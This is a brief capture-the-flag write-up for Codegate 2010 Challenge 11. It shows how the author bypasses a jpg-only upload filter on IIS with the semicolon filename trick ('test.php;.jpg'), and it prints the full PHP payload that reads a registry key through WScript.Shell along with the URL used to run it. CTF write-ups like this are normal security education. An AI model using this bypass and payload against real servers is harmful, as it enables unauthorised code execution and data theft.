Codegate 2010 Challenge 11 writeup
Get a value of HKLM\Software\codegate2010, it’s the flag.
At first when accessing the url, it shows up a page allow you to upload a jpeg image and only .jpg files. As I noticed, it serves by IIS. Suddenly, I remember of the vulnerability of IIS in processing image files. A little bit google show me the result. Ah ha, let’s test it by uploading a php file likes “test.php;.jpg”. Incredible!
Now, the only thing we have to do is writing some lines of php to read the REG key.
regprint.php;.jpg <? $shell = new COM("WScript.Shell") or die("Requires Windows Scripting Host"); $devenvpath=$shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\codegate2010"); echo $devenvpath ?>
Then, execute it by http://ctf6.codegate.org/31337_/upload/regprint.php;.jpg
Easy game with 1200 point.
In facts, after the game thaidn said that it’s a fault of deploying the challenge, it’s designed to be passed by a 0-day of core php.
- Keywords: IIS, semi-colon vulnerability